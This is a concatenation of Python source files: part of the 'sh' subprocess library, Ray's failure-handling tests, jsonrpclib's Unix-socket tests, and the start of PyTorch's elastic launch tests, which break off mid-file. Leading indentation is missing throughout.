self._buffering_lock.release()
if logging_enabled: self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
if logging_enabled: self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
if logging_enabled: self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
if logging_enabled: self.log.debug("released buffering lock for flushing buffer")
# this allows lookups to names that aren't found in the global scope to be
# searched for as a program name. for example, if "ls" isn't found in this
# module's scope, we consider it a system program and try to find it.
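# an illustrative lookup, e.g. from the REPL defined further below:
#   "ls"    -> not a python name here, so it resolves to the "ls" program
#   "cd"    -> matches the custom builtin b_cd defined on this class
#   "HOME"  -> found in os.environ and returned as a string
#   "id_"   -> the trailing underscore skips python's id() and runs the "id" program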
class Environment(dict):
def __init__(self, *args, **kwargs):
dict.__init__(self, *args, **kwargs)
self["Command"] = Command
self["CommandNotFound"] = CommandNotFound
self["ErrorReturnCode"] = ErrorReturnCode
self["ARGV"] = sys.argv[1:]
for i, arg in enumerate(sys.argv):
self["ARG%d" % i] = arg
# this needs to be last
self["env"] = os.environ
def __setitem__(self, k, v):
# are we altering an environment variable?
if "env" in self and k in self["env"]: self["env"][k] = v
# no? just setting a regular name
else: dict.__setitem__(self, k, v)
def __missing__(self, k):
# the only way we'd get to here is if we've tried to
# import * from a repl. so, raise an exception, since
# that's really the only sensible thing to do
if k == "__all__":
            raise ImportError("Cannot import * from sh. "
                              "Please import sh or import programs individually.")
# if we end with "_" just go ahead and skip searching
# our namespace for python stuff. this was mainly for the
# command "id", which is a popular program for finding
# if a user exists, but also a python function for getting
        # the address of an object. so you can call the python
        # version with "id" and the program version with "id_"
if not k.endswith("_"):
# check if we're naming a dynamically generated ReturnCode exception
try: return rc_exc_cache[k]
except KeyError:
m = rc_exc_regex.match(k)
if m: return get_rc_exc(int(m.group(1)))
# are we naming a commandline argument?
if k.startswith("ARG"):
return None
# is it a builtin?
try: return getattr(self["__builtins__"], k)
except AttributeError: pass
elif not k.startswith("_"): k = k.rstrip("_")
# how about an environment variable?
try: return os.environ[k]
except KeyError: pass
# is it a custom builtin?
builtin = getattr(self, "b_"+k, None)
if builtin: return builtin
# it must be a command then
return Command._create(k)
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
def b_cd(self, path):
os.chdir(path)
def b_which(self, program):
return which(program)
def run_repl(env):
banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try: line = raw_input("sh> ")
except (ValueError, EOFError): break
try: exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit: break
except: print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
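# so, for example, "from sh import ls, ifconfig" ends up in SelfWrapper.__getattr__,
# which defers to the Environment above and resolves each name as a program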
class SelfWrapper(ModuleType):
def __init__(self, self_module):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
for attr in ["__builtins__", "__doc__", "__name__", "__package__"]:
setattr(self, attr, getattr(self_module, attr))
self.self_module = self_module
self.env = Environment(globals())
def __getattr__(self, name):
return self.env[name]
# we're being run as a stand-alone script
if __name__ == "__main__":
try: arg = sys.argv.pop(1)
except: arg = None
if arg == "test":
import subprocess
def run_test(version):
py_version = "python%s" % version
py_bin = which(py_version)
if py_bin:
print("Testing %s" % py_version.capitalize())
p = subprocess.Popen([py_bin, os.path.join(THIS_DIR, "test.py")]
+ sys.argv[1:])
p.wait()
else:
print("Couldn't find %s, skipping" % py_version.capitalize())
versions = ("2.6", "2.7", "3.1", "3.2")
for version in versions: run_test(version)
else:
globs = globals()
f_globals = {}
for k in ["__builtins__", "__doc__", "__name__", "__package__"]:
f_globals[k] = globs[k]
env = Environment(f_globals)
run_repl(env)
# we're being imported from somewhere
else:
self = sys.modules[__name__]
sys.modules[__name__] = SelfWrapper(self)
|
failure_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import pytest
import sys
import tempfile
import threading
import time
import numpy as np
import redis
import ray
import ray.ray_constants as ray_constants
from ray.utils import _random_string
from ray.test.cluster_utils import Cluster
def relevant_errors(error_type):
return [info for info in ray.error_info() if info["type"] == error_type]
def wait_for_errors(error_type, num_errors, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(relevant_errors(error_type)) >= num_errors:
return
time.sleep(0.1)
raise Exception("Timing out of wait.")
@pytest.fixture
def ray_start_regular():
# Start the Ray processes.
ray.init(num_cpus=2)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_failed_task(ray_start_regular):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_return_vals=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
throw_exception_fct1.remote()
throw_exception_fct1.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
assert len(relevant_errors(ray_constants.TASK_PUSH_ERROR)) == 2
for task in relevant_errors(ray_constants.TASK_PUSH_ERROR):
msg = task.get("message")
assert "Test function 1 intentionally failed." in msg
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
@ray.remote
def f():
raise Exception("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
else:
# ray.get should throw an exception.
assert False
def test_fail_importing_remote_function(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g():
return module.temporary_python_file()
wait_for_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert len(errors) == 2
assert "No module named" in errors[0]["message"]
assert "No module named" in errors[1]["message"]
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(Exception):
ray.get(g.remote())
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_regular):
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
wait_for_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR, 2)
# Check that the error message is in the task info.
errors = relevant_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert "Function to run failed." in errors[0]["message"]
assert "Function to run failed." in errors[1]["message"]
def test_fail_importing_actor(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo(object):
def __init__(self):
self.x = module.temporary_python_file()
def get_val(self):
return 1
# There should be no errors yet.
assert len(ray.error_info()) == 0
# Create an actor.
foo = Foo.remote()
# Wait for the error to arrive.
wait_for_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR)
assert "No module named" in errors[0]["message"]
# Wait for the error from when the __init__ tries to run.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[0]["message"])
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception):
ray.get(foo.get_val.remote())
    # Wait for the error from the call to get_val.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[1]["message"])
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular):
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message1 in errors[0]["message"]
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 2
assert error_message1 in errors[1]["message"]
def test_failed_actor_method(ray_start_regular):
error_message2 = "actor method failed"
@ray.remote
class FailedActor(object):
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message2 in errors[0]["message"]
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor(object):
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular):
@ray.remote
def f():
ray.worker.global_worker._get_next_task_from_local_scheduler = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
wait_for_errors(ray_constants.WORKER_CRASH_PUSH_ERROR, 1)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_worker_dying(ray_start_regular):
# Define a remote function that will kill the worker that runs it.
@ray.remote
def f():
eval("exit()")
with pytest.raises(ray.exceptions.RayWorkerError):
ray.get(f.remote())
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert "died or was killed while executing" in errors[0]["message"]
def test_actor_worker_dying(ray_start_regular):
@ray.remote
class Actor(object):
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5.0)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_future_tasks(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote
class Actor(object):
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular):
@ray.remote
class Actor(object):
pass
a = Actor.remote()
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
assert len(ray.error_info()) == 0, (
"Should not have propogated an error - {}".format(ray.error_info()))
@pytest.fixture
def ray_start_object_store_memory():
# Start the Ray processes.
store_size = 10**6
ray.init(num_cpus=1, object_store_memory=store_size)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.mark.skip("This test does not work yet.")
def test_put_error1(ray_start_object_store_memory):
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("This test does not work yet.")
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
def test_version_mismatch(shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
wait_for_errors(ray_constants.VERSION_MISMATCH_PUSH_ERROR, 1)
# Reset the version.
ray.__version__ = ray_version
def test_warning_monitor_died(shutdown_only):
ray.init(num_cpus=0)
time.sleep(1) # Make sure the monitor has started.
# Cause the monitor to raise an exception by pushing a malformed message to
# Redis. This will probably kill the raylets and the raylet_monitor in
# addition to the monitor.
fake_id = 20 * b"\x00"
malformed_message = "asdf"
redis_client = ray.worker.global_worker.redis_client
redis_client.execute_command(
"RAY.TABLE_ADD", ray.gcs_utils.TablePrefix.HEARTBEAT_BATCH,
ray.gcs_utils.TablePubsub.HEARTBEAT_BATCH, fake_id, malformed_message)
wait_for_errors(ray_constants.MONITOR_DIED_ERROR, 1)
def test_export_large_objects(ray_start_regular):
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 1)
@ray.remote
class Foo(object):
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 2)
def test_warning_for_infeasible_tasks(ray_start_regular):
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo(object):
pass
# This task is infeasible.
f.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
# This actor placement task is infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 2)
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
@ray.remote
class Foo(object):
pass
# The actor creation should be infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
class Foo(object):
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
[Foo.remote() for _ in range(num_cpus)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 2)
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def g():
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
time.sleep(1)
ray.get(f.remote())
[g.remote() for _ in range(num_cpus * 4)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
def test_redis_module_failure(shutdown_only):
address_info = ray.init(num_cpus=1)
redis_address = address_info["redis_address"]
redis_address = redis_address.split(":")
assert len(redis_address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=redis_address[0], port=int(redis_address[1]))
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=redis_address[0], port=int(redis_address[1]))
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
@pytest.fixture
def ray_start_two_nodes():
# Start the Ray processes.
cluster = Cluster()
for _ in range(2):
cluster.add_node(
num_cpus=0,
_internal_config=json.dumps({
"num_heartbeats_timeout": 40
}))
ray.init(redis_address=cluster.redis_address)
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_two_nodes):
cluster = ray_start_two_nodes
cluster.wait_for_nodes()
client_ids = {item["ClientID"] for item in ray.global_state.client_table()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_client_ids = {
item["message"].split(" ")[5]
for item in relevant_errors(ray_constants.REMOVED_NODE_ERROR)
}
assert client_ids == warning_client_ids
def test_raylet_crash_when_get(ray_start_regular):
nonexistent_id = ray.ObjectID(_random_string())
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(Exception, match=r".*Connection closed unexpectedly.*"):
ray.get(nonexistent_id)
thread.join()
|
test_unix.py
|
#!/usr/bin/python
# -- Content-Encoding: UTF-8 --
"""
Tests the server & client in Unix socket mode (when available)
:license: Apache License 2.0
"""
# JSON-RPC library
from jsonrpclib import ServerProxy
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer
# Standard library
import os
import random
import socket
import threading
import unittest
# ------------------------------------------------------------------------------
if not hasattr(socket, "AF_UNIX"):
raise unittest.SkipTest("Unix sockets are not supported here.")
class UnixSocketTests(unittest.TestCase):
"""
    These tests ensure that the server and client work in Unix socket mode
"""
def test_full_path(self):
"""
        Starts a Unix socket server, given the full path to the socket
"""
# Ensure we have a new socket
socket_name = "/tmp/test_server.socket"
if os.path.exists(socket_name):
os.remove(socket_name)
# Use a random int as result
awaited_result = random.randint(1, 100)
try:
# Prepare the server
srv = SimpleJSONRPCServer(
socket_name, address_family=socket.AF_UNIX
)
srv.register_function(lambda: awaited_result, "test")
# Run the server in a thread
thread = threading.Thread(target=srv.serve_forever)
thread.start()
try:
# Run the request (use '.' as hostname)
client = ServerProxy("unix+http://./{}".format(socket_name))
result = client.test()
self.assertEqual(result, awaited_result)
finally:
# Stop the server
srv.shutdown()
srv.server_close()
thread.join(5)
finally:
# Clean up
try:
os.remove(socket_name)
except:
pass
def test_host_only(self):
"""
        Starts a Unix socket server, given a relative path to the socket
"""
# Ensure we have a new socket
socket_name = "test_local.socket"
if os.path.exists(socket_name):
os.remove(socket_name)
# Use a random int as result
awaited_result = random.randint(1, 100)
try:
# Prepare the server
srv = SimpleJSONRPCServer(
socket_name, address_family=socket.AF_UNIX
)
srv.register_function(lambda: awaited_result, "test")
# Run the server in a thread
thread = threading.Thread(target=srv.serve_forever)
thread.start()
try:
# Run the request
client = ServerProxy("unix+http://{}".format(socket_name))
result = client.test()
self.assertEqual(result, awaited_result)
finally:
# Stop the server
srv.shutdown()
srv.server_close()
thread.join(5)
finally:
# Clean up
try:
os.remove(socket_name)
except:
pass
|
run_test.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import os
import shutil
import subprocess
import tempfile
import unittest
import uuid
from contextlib import closing
from unittest import mock
from unittest.mock import Mock, patch
import torch.distributed.run as launch
from torch.distributed.elastic.agent.server.api import RunResult, WorkerState
from torch.distributed.elastic.multiprocessing.errors import ChildFailedError
from torch.distributed.elastic.rendezvous.etcd_server import EtcdServer
from torch.distributed.elastic.utils import get_socket_with_port
from torch.testing._internal.common_utils import (
TEST_WITH_DEV_DBG_ASAN,
sandcastle_skip_if,
)
def launch_in_proc(args):
launch.main(args)
def path(script):
return os.path.join(os.path.dirname(__file__), script)
def get_child_pids(pid):
pgrep = subprocess.Popen(args=f"pgrep -P {pid}", shell=True, stdout=subprocess.PIPE)
pgrep.wait()
out = pgrep.stdout.read().decode("utf-8").rstrip().split("\n")
pids = []
for pid in out:
if pid:
pids.append(int(pid))
return pids
def pid_exists(pid):
try:
os.kill(pid, 0)
return True
except OSError:
return False
class MockException(Exception):
pass
class ElasticLaunchTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# start a standalone, single process etcd server to use for all tests
cls._etcd_server = EtcdServer()
cls._etcd_server.start()
cls._etcd_endpoint = cls._etcd_server.get_endpoint()
@classmethod
def tearDownClass(cls):
# stop the standalone etcd server
cls._etcd_server.stop()
def setUp(self):
self.test_dir = tempfile.mkdtemp()
# remove any lingering environment variables
for env in os.environ.keys():
if env.startswith("PET_"):
del os.environ[env]
# set a sentinel env var on the parent proc
# this should be present on the child and gets
# asserted in ``bin/test_script.py``
os.environ["TEST_SENTINEL_PARENT"] = "FOOBAR"
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_launch_user_script_python(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_launch_user_script_python_caffe2_bc(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
sock = get_socket_with_port()
with closing(sock):
master_port = sock.getsockname()[1]
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=spawn",
"--master_addr=localhost",
f"--master_port={master_port}",
"--node_rank=0",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_user_script_bash(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_user_script_default_nproc(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
world_size = 1
args = [
f"--nnodes={nnodes}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_launch_with_env_vars(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
os.environ["PET_NNODES"] = str(nnodes)
os.environ["PET_NPROC_PER_NODE"] = str(nproc_per_node)
os.environ["PET_RDZV_BACKEND"] = "etcd"
os.environ["PET_RDZV_ENDPOINT"] = self._etcd_endpoint
os.environ["PET_RDZV_ID"] = run_id
os.environ["PET_MONITOR_INTERVAL"] = "1"
os.environ["PET_START_METHOD"] = "spawn"
os.environ["PET_NO_PYTHON"] = "1"
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
os.environ["PET_MODULE"] = "1"
launch.main(script_args)
os.environ["PET_MODULE"] = "0"
launch.main(script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def _test_nproc_launch_configuration(self, nproc_type, expected_number):
run_id = str(uuid.uuid4().int)
nnodes = 1
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_type}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=spawn",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
launch.main(args + script_args)
world_size = nnodes * expected_number
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_nproc_launch_auto_configurations(self):
